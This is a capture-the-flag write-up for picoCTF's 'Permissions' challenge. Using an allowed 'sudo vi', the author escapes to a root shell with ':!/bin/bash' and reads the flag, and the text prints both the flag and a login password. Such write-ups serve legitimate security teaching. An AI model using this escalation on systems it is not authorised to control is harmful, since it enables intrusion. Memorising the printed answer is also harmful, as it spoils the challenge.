picoCTF 'Permissions' Write Up

Enumeration

Let’s start our instance and log in!

Command: ssh -p 51767 picoplayer@saturn.picoctf.net
Password: NBD+zO8s4y

We can start by figuring out what files we have in our user folder.

picoplayer@challenge:~$ ls
picoplayer@challenge:~$ ll
total 12
drwxr-xr-x 1 picoplayer picoplayer   20 Sep 29 20:44 ./
drwxr-xr-x 1 root       root         24 Aug  4  2023 ../
-rw-r--r-- 1 picoplayer picoplayer  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 picoplayer picoplayer 3771 Feb 25  2020 .bashrc
drwx------ 2 picoplayer picoplayer   34 Sep 29 20:44 .cache/
-rw-r--r-- 1 picoplayer picoplayer  807 Feb 25  2020 .profile

Looks like there’s nothing that can help us. The challenge description wants us to find something in the root folder. Let’s check there.

picoplayer@challenge:~$ cd /root
-bash: cd: /root: Permission denied
picoplayer@challenge:~$ ll /root
ls: cannot open directory '/root': Permission denied

Nothing that can help us here. We need to figure out what root permissions we have in order to gain access to the root folder. We can do this by using sudo -l to list all possible commands that we have superuser access for.

picoplayer@challenge:~$ sudo -l
[sudo] password for picoplayer: 
Matching Defaults entries for picoplayer on challenge:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User picoplayer may run the following commands on challenge:
    (ALL) /usr/bin/vi

Bingo! We have access to vim, and we can use that program to gain access to the root folder.

Root Access

Let’s start by using vim to give us a basic root shell. The command mode in vim allows us to run any Linux command as root, including /bin/bash.

Start vim by using sudo /usr/bin/vi.

Enter :!/bin/bash. The :! allows us to type in any Linux command. /bin/bash is the Linux command we want to run.

~                                                                               
~                                                                               
~                              VIM - Vi IMproved                                
~                                                                               
~                               version 8.1.3741                                
~                           by Bram Moolenaar et al.                            
~                   Modified by team+vim@tracker.debian.org                     
~                 Vim is open source and freely distributable                   
~                                                                               
~                        Help poor children in Uganda!                          
~                type  :help iccf<Enter>       for information                  
~                                                                               
~                type  :q<Enter>               to exit                          
~                type  :help<Enter>  or  <F1>  for on-line help                 
~                type  :help version8<Enter>   for version info                 
~                                                                               
~                                                                               
~                                                                               
:!/bin/bash

Press enter, and it should take you back to your original terminal screen.

picoplayer@challenge:~$ sudo /usr/bin/vi
[sudo] password for picoplayer: 

root@challenge:/home/picoplayer# 

From here, let’s go to the root directory and see what we have!

root@challenge:/home/picoplayer# cd /root
root@challenge:~# ll
total 12
drwx------ 1 root root   23 Aug  4  2023 ./
drwxr-xr-x 1 root root   51 Sep 29 20:57 ../
-rw-r--r-- 1 root root 3106 Dec  5  2019 .bashrc
-rw-r--r-- 1 root root   35 Aug  4  2023 .flag.txt
-rw-r--r-- 1 root root  161 Dec  5  2019 .profile

That .flag.txt file looks very enticing. Let’s print out its contents.

root@challenge:~# cat .flag.txt 
picoCTF{uS1ng_v1m_3dit0r_1cee9dcb}

We found our flag!

picoCTF{uS1ng_v1m_3dit0r_1cee9dcb}